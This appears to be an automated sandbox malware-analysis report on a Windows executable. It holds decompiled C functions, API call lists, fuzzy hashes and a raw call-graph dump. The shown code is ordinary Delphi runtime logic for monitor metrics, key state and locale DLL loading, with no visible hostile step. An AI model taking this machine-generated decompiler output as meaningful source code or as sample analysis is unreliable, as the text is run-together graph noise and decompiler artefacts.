                                  C-Code - Quality: 68%
                                  			E004254F0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t15;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				signed int _t19;
                                  				void* _t20;
                                  				intOrPtr _t21;
                                  
                                  				_t19 = _a12;
                                  				if( *0x47092f != 0) {
                                  					_t16 = 0;
                                  					if((_t19 & 0x00000003) != 0) {
                                  						L7:
                                  						_t16 = 0x12340042;
                                  					} else {
                                  						_t21 = _a4;
                                  						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                  							goto L7;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 =  *0x470910; // 0x4254f0
                                  					 *0x470910 = E0042525C(3, _t15, _t18, _t19, _t20);
                                  					_t16 =  *0x470910(_a4, _a8, _t19);
                                  				}
                                  				return _t16;
                                  			}














                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042553E
                                  • GetSystemMetrics.USER32 ref: 00425550
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromPoint
                                  • API String ID: 1792783759-1072306578
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004253C8(intOrPtr* _a4, signed int _a8) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t19;
                                  
                                  				_t17 = _a8;
                                  				_t14 = _a4;
                                  				if( *0x47092e != 0) {
                                  					_t19 = 0;
                                  					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                  						_t19 = 0x12340042;
                                  					}
                                  				} else {
                                  					_t16 =  *0x47090c; // 0x4253c8
                                  					 *0x47090c = E0042525C(2, _t14, _t16, _t17, _t18);
                                  					_t19 =  *0x47090c(_t14, _t17);
                                  				}
                                  				return _t19;
                                  			}













                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00425419
                                  • GetSystemMetrics.USER32 ref: 00425425
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect
                                  • API String ID: 1792783759-4033241945
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0043D5D0(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				void* _t22;
                                  				void* _t28;
                                  
                                  				_v8 = __ecx;
                                  				_t28 = __eax;
                                  				_t22 = 0;
                                  				if(E004426DC(__eax) != 0) {
                                  					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
                                  					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
                                  						E0043D634(_t28, _t32);
                                  						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
                                  						_t5 =  &_a4; // 0x432b58
                                  						E0043D4B0(__edx,  *_t5, _v8,  &_v16);
                                  						_t7 =  &_v12; // 0x432b58
                                  						_push( *_t7);
                                  						_push(_v16);
                                  						_push( *((intOrPtr*)(_t28 + 0x6c)));
                                  						L004251E4();
                                  						asm("sbb ebx, ebx");
                                  						_t22 = __edx + 1;
                                  					}
                                  				}
                                  				return _t22;
                                  			}









                                  APIs
                                    • Part of subcall function 0043D634: 734518F0.COMCTL32(?,00000000,0043D5F9,00000000,00000000,00000000), ref: 0043D64C
                                    • Part of subcall function 0043D4B0: ClientToScreen.USER32(?,0043D67C), ref: 0043D4C8
                                    • Part of subcall function 0043D4B0: GetWindowRect.USER32 ref: 0043D4D2
                                  • 73451850.COMCTL32(?,?,X+C,?,00000000,00000000,00000000), ref: 0043D61B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: 73451873451850ClientRectScreenWindow
                                  • String ID: X+C$X+C
                                  • API String ID: 1718620977-724829664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E0040CDB8(void* __edx) {
                                  				void* _t6;
                                  				void* _t13;
                                  				void* _t17;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t22;
                                  
                                  				_t17 = __edx;
                                  				if(__edx != 0) {
                                  					_t22 = _t22 + 0xfffffff0;
                                  					_t6 = E004036BC(_t6, _t21);
                                  				}
                                  				_t20 = _t6;
                                  				E00403368(0);
                                  				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
                                  				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
                                  				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
                                  				 *(_t20 + 0x18) = 0xffffffff;
                                  				 *((intOrPtr*)(_t20 + 0x20)) = E00403368(1);
                                  				_t13 = _t20;
                                  				if(_t17 != 0) {
                                  					E00403714(_t13);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t20;
                                  			}










                                  APIs
                                  • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,0041AE0D,00000000,0041AE61), ref: 0040CDE2
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,0041AE0D,00000000,0041AE61), ref: 0040CDF2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateEvent
                                  • String ID: ({@
                                  • API String ID: 2692171526-1929916391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00425340(int _a4) {
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t2;
                                  				signed int _t3;
                                  				int _t8;
                                  				void* _t12;
                                  				void* _t13;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t8 = _a4;
                                  				if( *0x47092c == 0) {
                                  					 *0x470904 = E0042525C(0, _t8,  *0x470904, _t17, _t18);
                                  					return GetSystemMetrics(_t8);
                                  				}
                                  				_t3 = _t2 | 0xffffffff;
                                  				_t12 = _t8 + 0xffffffb4 - 2;
                                  				__eflags = _t12;
                                  				if(__eflags < 0) {
                                  					_t3 = 0;
                                  				} else {
                                  					if(__eflags == 0) {
                                  						_t8 = 0;
                                  					} else {
                                  						_t13 = _t12 - 1;
                                  						__eflags = _t13;
                                  						if(_t13 == 0) {
                                  							_t8 = 1;
                                  						} else {
                                  							__eflags = _t13 - 0xffffffffffffffff;
                                  							if(_t13 - 0xffffffffffffffff < 0) {
                                  								_t3 = 1;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				__eflags = _t3 - 0xffffffff;
                                  				if(_t3 != 0xffffffff) {
                                  					return _t3;
                                  				} else {
                                  					return GetSystemMetrics(_t8);
                                  				}
                                  			}













                                  APIs
                                  • GetSystemMetrics.USER32 ref: 004253A2
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  • GetSystemMetrics.USER32 ref: 00425368
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: GetSystemMetrics
                                  • API String ID: 1792783759-96882338
                                  • Opcode ID: b2fc06f352e338549a50a20148af2b1428e776a032ad9fa79cce12c08c9ebe4f
                                  • Instruction ID: fbce5eb428aeec31300f1743459cd9658f4b93445a861dd91e49e670b50fdd29
                                  • Opcode Fuzzy Hash: b2fc06f352e338549a50a20148af2b1428e776a032ad9fa79cce12c08c9ebe4f
                                  • Instruction Fuzzy Hash: 25F096F0715A28CAD710C734BD8423A374597953B0FD06E33EA1686AD5C1FC9C81561D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00448C38(void* __eax) {
                                  				signed char _v17;
                                  				signed char _v24;
                                  				signed int _t8;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t8 = _v24 & 0x000000ff;
                                  				if(_t8 != 0) {
                                  					if(GetKeyState(0x10) < 0) {
                                  						_t8 = _t8 + 0x2000;
                                  					}
                                  					if(GetKeyState(0x11) < 0) {
                                  						_t8 = _t8 + 0x4000;
                                  					}
                                  					if((_v17 & 0x00000020) != 0) {
                                  						_t8 = _t8 + 0x8000;
                                  					}
                                  				}
                                  				return _t8;
                                  			}







                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 00448C53
                                  • GetKeyState.USER32(00000011), ref: 00448C64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 4fc2664c9da60407ce52c29c3fefb565ddfb21a5d1a5af4f2281d8f349cb0f06
                                  • Instruction ID: 00cf6cdc7884a40f663b642f68fb97ab7c433ce7d7085603b7435de91eb9e162
                                  • Opcode Fuzzy Hash: 4fc2664c9da60407ce52c29c3fefb565ddfb21a5d1a5af4f2281d8f349cb0f06
                                  • Instruction Fuzzy Hash: 90E06822701B4212F61274AE1CC03EB23C04FA33ACF09027FFDC42E1C2EA9E091151B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:961
                                  Total number of Limit Nodes:31

                                  Graph

4349b8 56 API calls 29372->29412 29374 446c02 29375 446c31 29374->29375 29376 446c0e MulDiv 29374->29376 29377 446c60 29375->29377 29378 446c3d MulDiv 29375->29378 29376->29375 29377->29361 29379 446c6c MulDiv MulDiv 29377->29379 29378->29377 29379->29361 29381 41692c 56 API calls 29380->29381 29382 4181a1 29381->29382 29383 403f3c 25 API calls 29382->29383 29384 4181af 29383->29384 29429 404364 29384->29429 29387 41692c 56 API calls 29388 417e03 29387->29388 29389 412e58 58 API calls 29388->29389 29389->29307 29390->29311 29393 416937 29391->29393 29392 416971 29392->29324 29395 4163ec 56 API calls 29392->29395 29393->29392 29396 416978 56 API calls 29393->29396 29395->29324 29396->29393 29397->29330 29398->29334 29399->29330 29400->29343 29401->29347 29402->29348 29403->29349 29404->29346 29406 430f66 29405->29406 29415 42dc30 29406->29415 29408 430f7e 29408->29359 29409->29358 29410->29364 29411->29372 29412->29374 29413->29366 29414->29362 29416 42dc4c 29415->29416 29417 4194f8 92 API calls 29416->29417 29418 42dc62 29417->29418 29419 42dcbd 29418->29419 29420 42f98c 126 API calls 29418->29420 29419->29408 29421 42dc7d 29420->29421 29422 42f98c 126 API calls 29421->29422 29423 42dc8d 29422->29423 29424 42f98c 126 API calls 29423->29424 29425 42dc9d 29424->29425 29426 42f98c 126 API calls 29425->29426 29427 42dcad 29426->29427 29428 42f98c 126 API calls 29427->29428 29428->29419 29430 404318 29429->29430 29431 404353 29430->29431 29432 403f10 25 API calls 29430->29432 29431->29387 29433 40432f 29432->29433 29433->29431 29435 4026dc 11 API calls 29433->29435 29435->29431 29436->28969 29445 44da54 PeekMessageA 29437->29445 29440 44db08 29440->28974 29442->28972 29443->28974 29444->28974 29446 44dade 29445->29446 29447 44da70 29445->29447 29446->29440 29457 44e3bc 140 API calls 29446->29457 29447->29446 29458 44d9b4 29447->29458 29456 44dad0 TranslateMessage DispatchMessageA 29456->29446 29457->29440 29459 44d9df 29458->29459 29460 44d9c8 29458->29460 29459->29446 
29462 44d8ac 29459->29462 29460->29459 29482 44e914 8 API calls 29460->29482 29463 44d8f6 29462->29463 29464 44d8bc 29462->29464 29463->29446 29466 44d8fc 29463->29466 29464->29463 29465 44d8e3 TranslateMDISysAccel 29464->29465 29465->29463 29467 44d914 29466->29467 29468 44d9ad 29466->29468 29467->29468 29469 44d91f GetCapture 29467->29469 29468->29446 29479 44d888 29468->29479 29470 44d980 GetWindowLongA 29469->29470 29474 44d92a 29469->29474 29470->29468 29471 44d990 SendMessageA 29470->29471 29471->29468 29472 44d97c 29471->29472 29472->29468 29475 44d95b 29474->29475 29477 44d944 GetParent 29474->29477 29478 44d93b 29474->29478 29483 42b6d4 7 API calls 29474->29483 29476 44d961 SendMessageA 29475->29476 29475->29478 29476->29468 29476->29472 29477->29474 29478->29476 29480 44d8a8 29479->29480 29481 44d89b IsDialogMessage 29479->29481 29480->29446 29480->29456 29481->29480 29482->29459 29483->29474 29484 449f58 29485 449f80 29484->29485 29486 449fa8 29484->29486 29485->29486 29540 40597c 56 API calls 29485->29540 29531 44e66c 29486->29531 29490 449f99 29541 40b1b8 25 API calls 29490->29541 29491 44a3ee 29493 44a388 29495 44a3da 29493->29495 29545 449104 64 API calls 29493->29545 29494 449fec 29502 44a053 29494->29502 29506 44a10a 29494->29506 29497 44a3e6 29495->29497 29498 44a3f3 29495->29498 29546 43244c 56 API calls 29497->29546 29500 44a41e 29498->29500 29501 44a3ff 29498->29501 29503 44a428 GetActiveWindow 29500->29503 29507 44a416 SetWindowPos 29501->29507 29530 44a105 29502->29530 29542 4483b4 56 API calls 29502->29542 29508 44a433 29503->29508 29527 44a452 29503->29527 29504 44a363 29511 44a37d ShowWindow 29504->29511 29505 44a2ae 29509 44a2f0 29505->29509 29510 44a2ba 29505->29510 29506->29530 29543 4483b4 56 API calls 29506->29543 29507->29491 29512 44a43b IsIconic 29508->29512 29514 44a30a ShowWindow 29509->29514 29513 44a2c4 SendMessageA 29510->29513 29511->29491 29517 44a445 29512->29517 29512->29527 29518 434ef4 29513->29518 29519 434ef4 
29514->29519 29515 44a458 29520 44a46f SetWindowPos SetActiveWindow 29515->29520 29516 44a47d 29521 44a487 ShowWindow 29516->29521 29547 444d68 GetCurrentThreadId 72E7AC10 29517->29547 29522 44a2e8 ShowWindow 29518->29522 29523 44a32e CallWindowProcA 29519->29523 29520->29491 29521->29491 29524 44a341 SendMessageA 29522->29524 29544 42ea44 29523->29544 29524->29491 29527->29515 29527->29516 29530->29504 29530->29505 29532 44e67f 29531->29532 29538 449fb7 29531->29538 29533 44e6e2 29532->29533 29536 44e6d3 29532->29536 29539 44e6c9 IsChild 29532->29539 29548 44b85c 29532->29548 29534 44e610 2 API calls 29533->29534 29534->29538 29551 44e610 IsWindowVisible 29536->29551 29538->29491 29538->29493 29538->29494 29539->29532 29539->29536 29540->29490 29541->29486 29542->29530 29543->29530 29544->29524 29545->29495 29546->29491 29547->29527 29549 4136f8 56 API calls 29548->29549 29550 44b86c 29549->29550 29550->29532 29552 44e667 29551->29552 29553 44e633 29551->29553 29552->29538 29553->29552 29554 44e63b SetWindowPos 29553->29554 29554->29552 29555 449618 29556 449627 29555->29556 29561 448040 29556->29561 29559 449647 29562 4480d4 29561->29562 29572 448064 29561->29572 29564 4480e5 29562->29564 29592 441b78 72 API calls 29562->29592 29565 448125 29564->29565 29568 4481bd 29564->29568 29569 448198 29565->29569 29578 448140 29565->29578 29566 44b85c 56 API calls 29566->29572 29567 4481d7 29570 448196 29567->29570 29571 4481e9 29567->29571 29568->29567 29573 4481d1 SetMenu 29568->29573 29569->29567 29580 4481ac 29569->29580 29570->29567 29594 449104 64 API calls 29570->29594 29595 447f78 62 API calls 29571->29595 29572->29562 29572->29566 29590 40597c 56 API calls 29572->29590 29591 40b1f4 56 API calls 29572->29591 29573->29567 29576 4481f0 29579 403e4c 11 API calls 29576->29579 29578->29567 29584 448163 GetMenu 29578->29584 29581 448205 29579->29581 29583 4481b5 SetMenu 29580->29583 29581->29559 29589 44951c 10 API calls 29581->29589 29583->29567 29585 448186 
29584->29585 29586 44816d 29584->29586 29593 441b78 72 API calls 29585->29593 29588 448180 SetMenu 29586->29588 29588->29585 29589->29559 29590->29572 29591->29572 29592->29564 29593->29570 29594->29571 29595->29576 29596 445e88 29597 445ea4 29596->29597 29598 445e93 29596->29598 29599 445ea6 29598->29599 29600 445e9d 29598->29600 29611 4459bc 62 API calls 29599->29611 29605 445e64 29600->29605 29603 445eb3 29612 4459bc 62 API calls 29603->29612 29606 445e86 29605->29606 29607 445e70 29605->29607 29606->29597 29613 445270 29607->29613 29610 445270 62 API calls 29610->29606 29611->29603 29612->29597 29614 445309 29613->29614 29615 44528e 29613->29615 29614->29610 29616 44530b 29615->29616 29621 44529c 29615->29621 29617 4459a4 62 API calls 29616->29617 29617->29614 29618 4452f2 29622 4459a4 29618->29622 29620 431c54 56 API calls 29620->29621 29621->29618 29621->29620 29623 4459ad 29622->29623 29626 445ee4 29623->29626 29625 4459ba 29625->29614 29627 445fd6 29626->29627 29628 445efb 29626->29628 29627->29625 29628->29627 29647 445484 29628->29647 29631 445f35 29633 445af0 62 API calls 29631->29633 29632 445f5b 29634 445484 2 API calls 29632->29634 29635 445f47 29633->29635 29636 445f69 29634->29636 29637 445af0 62 API calls 29635->29637 29638 445f93 29636->29638 29639 445f6d 29636->29639 29642 445f59 29637->29642 29650 445af0 29638->29650 29640 445af0 62 API calls 29639->29640 29643 445f7f 29640->29643 29642->29625 29645 445af0 62 API calls 29643->29645 29645->29642 29646 445af0 62 API calls 29646->29642 29662 445404 29647->29662 29649 445492 29649->29631 29649->29632 29651 445b16 29650->29651 29652 445404 2 API calls 29651->29652 29653 445b2f 29651->29653 29652->29653 29654 445404 2 API calls 29653->29654 29655 445b7d 29654->29655 29672 4459e8 29655->29672 29657 445b97 29676 44586c 59 API calls 29657->29676 29659 445bc8 29660 445404 2 API calls 29659->29660 29661 445bd3 29660->29661 29661->29646 29663 434ef4 29662->29663 29664 445421 GetWindowLongA 29663->29664 
29665 44545e 29664->29665 29666 44543e 29664->29666 29671 445388 GetWindowLongA 29665->29671 29670 445388 GetWindowLongA 29666->29670 29669 44544a 29669->29649 29670->29669 29671->29669 29674 445a25 29672->29674 29677 41bf6c 29674->29677 29675 445aca 29675->29657 29676->29659 29678 41bf70 GetSysColor 29677->29678 29679 41bf7b 29677->29679 29678->29679 29679->29675 29680 431eac 29686 431edf 29680->29686 29681 431f58 GetClassInfoA 29682 431f7f 29681->29682 29683 431fbd 29682->29683 29684 431f90 UnregisterClassA 29682->29684 29685 431f9d RegisterClassA 29682->29685 29710 43207c 29683->29710 29684->29685 29685->29683 29688 431fb8 29685->29688 29686->29681 29694 431f0c 29686->29694 29737 40597c 56 API calls 29686->29737 29739 40c5c8 58 API calls 29688->29739 29691 431f41 29738 40b1f4 56 API calls 29691->29738 29692 431fe1 GetWindowLongA 29696 432017 29692->29696 29697 431ff6 GetWindowLongA 29692->29697 29694->29681 29713 4084a8 29696->29713 29697->29696 29698 432008 SetWindowLongA 29697->29698 29698->29696 29702 43202b 29724 41c440 29702->29724 29704 432035 29705 42f98c 126 API calls 29704->29705 29706 432043 29705->29706 29707 403e4c 11 API calls 29706->29707 29708 43206c 29707->29708 29741 40679c 29710->29741 29712 431fd3 29712->29692 29740 40c5c8 58 API calls 29712->29740 29714 4084b6 29713->29714 29715 4084ac 29713->29715 29717 435160 IsIconic 29714->29717 29746 4026dc 11 API calls 29715->29746 29718 435178 GetWindowPlacement 29717->29718 29719 43519d GetWindowRect 29717->29719 29720 4351aa GetWindowLongA 29718->29720 29719->29720 29721 4351e5 29720->29721 29722 4351bf GetWindowLongA 29720->29722 29721->29702 29722->29721 29723 4351d3 ScreenToClient ScreenToClient 29722->29723 29723->29721 29725 41c475 29724->29725 29726 41c5a8 29724->29726 29747 41b784 RtlEnterCriticalSection 29725->29747 29752 403e70 11 API calls 29726->29752 29729 41c589 29751 41b790 RtlLeaveCriticalSection 29729->29751 29730 41c5c8 29730->29704 29731 41c47f 29731->29729 29748 407ad0 29731->29748 
29733 41c5a0 29733->29704 29735 41c57a CreateFontIndirectA 29735->29729 29736 41c516 29736->29735 29737->29691 29738->29694 29739->29683 29740->29692 29745 402908 29741->29745 29743 4067af CreateWindowExA 29744 4067e9 29743->29744 29744->29712 29745->29743 29746->29714 29747->29731 29749 407add 29748->29749 29750 407af5 CompareStringA 29749->29750 29750->29736 29751->29733 29752->29730

                                  Executed Functions

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E004050DC(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v15;
                                  				char _v17;
                                  				char _v18;
                                  				char _v22;
                                  				int _v28;
                                  				char _v289;
                                  				long _t44;
                                  				long _t61;
                                  				long _t63;
                                  				CHAR* _t70;
                                  				CHAR* _t72;
                                  				struct HINSTANCE__* _t78;
                                  				struct HINSTANCE__* _t84;
                                  				char* _t94;
                                  				void* _t95;
                                  				intOrPtr _t99;
                                  				struct HINSTANCE__* _t107;
                                  				void* _t110;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  
                                  				_t110 = _t112;
                                  				_t113 = _t112 + 0xfffffee0;
                                  				_v8 = __eax;
                                  				GetModuleFileNameA(0,  &_v289, 0x105);
                                  				_v22 = 0;
                                  				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  				if(_t44 == 0) {
                                  					L3:
                                  					_push(_t110);
                                  					_push(0x4051e1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t113;
                                  					_v28 = 5;
                                  					E00404F24( &_v289, 0x105);
                                  					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405348, 0, 0,  &_v22,  &_v28) != 0) {
                                  						_v22 = 0;
                                  					}
                                  					_v18 = 0;
                                  					_pop(_t99);
                                  					 *[fs:eax] = _t99;
                                  					_push(E004051E8);
                                  					return RegCloseKey(_v12);
                                  				} else {
                                  					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  					if(_t61 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                  						if(_t63 != 0) {
                                  							_push(0x105);
                                  							_push(_v8);
                                  							_push( &_v289);
                                  							L00401294();
                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                  							_t107 = 0;
                                  							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                  								_t70 =  &_v289;
                                  								_push(_t70);
                                  								L0040129C();
                                  								_t94 = _t70 +  &_v289;
                                  								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                  									_t94 = _t94 - 1;
                                  								}
                                  								_t72 =  &_v289;
                                  								if(_t94 != _t72) {
                                  									_t95 = _t94 + 1;
                                  									if(_v22 != 0) {
                                  										_push(0x105 - _t95 - _t72);
                                  										_push( &_v22);
                                  										_push(_t95);
                                  										L00401294();
                                  										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                  									}
                                  									if(_t107 == 0 && _v17 != 0) {
                                  										_push(0x105 - _t95 -  &_v289);
                                  										_push( &_v17);
                                  										_push(_t95);
                                  										L00401294();
                                  										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  										_t107 = _t78;
                                  										if(_t107 == 0) {
                                  											_v15 = 0;
                                  											_push(0x105 - _t95 -  &_v289);
                                  											_push( &_v17);
                                  											_push(_t95);
                                  											L00401294();
                                  											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                  											_t107 = _t84;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							return _t107;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?), ref: 004050F8
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001), ref: 00405116
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4), ref: 00405134
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405152
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040519B
                                  • RegQueryValueExA.ADVAPI32(?,00405348,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001), ref: 004051B9
                                  • RegCloseKey.ADVAPI32(?,004051E8,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004051DB
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004051F8
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405205
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040520B
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405236
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040527D
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040528D
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004052B5
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004052C5
